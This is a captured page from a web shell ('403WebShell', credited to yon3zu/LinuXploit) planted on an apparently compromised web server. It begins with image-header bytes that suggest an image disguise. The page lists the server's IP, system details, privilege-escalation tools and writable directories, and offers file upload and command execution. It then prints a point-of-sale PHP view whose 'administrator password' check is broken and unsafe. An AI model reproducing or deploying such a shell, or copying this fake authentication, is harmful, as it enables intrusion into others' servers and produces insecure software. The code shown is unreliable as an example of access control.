����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 18.216.67.104
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/muebles/pos11/core/app/view/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/muebles/pos11/core/app/view/delsellSeguridad-view.php

<script> 

var color = "" 
while (color != "admin" && color != "no"){ 
   	color = prompt("Estas seguro que quieres eliminar (no=cancelar)? dame la clave de administrador)","") 
	}
    
</script>

<form action="javascript:window.parent."color".value">
Introduzca la contraseña
<input type=Password>
<input type=submit>
</form>


<?php header('X-Accel-Buffering: no');?>
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <title>Eliminando...</title>
        <style type="text/css">
            .barra{
                background-color: #f5f5f5;
                border-radius: 5px;
                height: 25px;
                width: 300px;
                border: solid 1px #ccc;
                box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1) inset;
            }
            .progreso{
                border-radius: 5px;
                height: 25px;
                width: 0%;
                border-right: solid 1px #ccc;
                background-color: lightblue;
                background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
            }
            .porcentaje{
                padding-right: 7px;
                padding-top: 2px;
                text-align: right;
            }
        </style>
    </head>
    <body>
        <h3>Eliminando Registro Espere por favor...</h3>
        <div class="barra">
            <div class="progreso"><div class="porcentaje"></div></div>
        </div>
    </body>
</html>
<?php
@ob_flush();
flush();
$total = 200;
for ($i = 0; $i <= $total; $i = $i + 1):
    $actual = $i;
    $porcentaje = round(($actual / $total) * 100, 0);
    ?>
    <script type="text/javascript">
        document.getElementsByClassName("progreso")[0].style.width = "<?php echo $porcentaje; ?>%";
        document.getElementsByClassName("porcentaje")[0].innerHTML = "<?php echo $porcentaje; ?>%";
    </script>
    <?php
    @ob_flush();
    flush();
    usleep(30000);
endfor;
?>

<?php
$color = '<script> document.write(color) </script>';
$sell =$_GET["id"];
echo $color;
if ($color =='admin')
{Core::redir("./index.php?view=delsell&id=$sell");}
else
{
  Core::redir("./index.php?view=sells");	
}


?>

Youez - 2016 - github.com/yon3zu
LinuXploit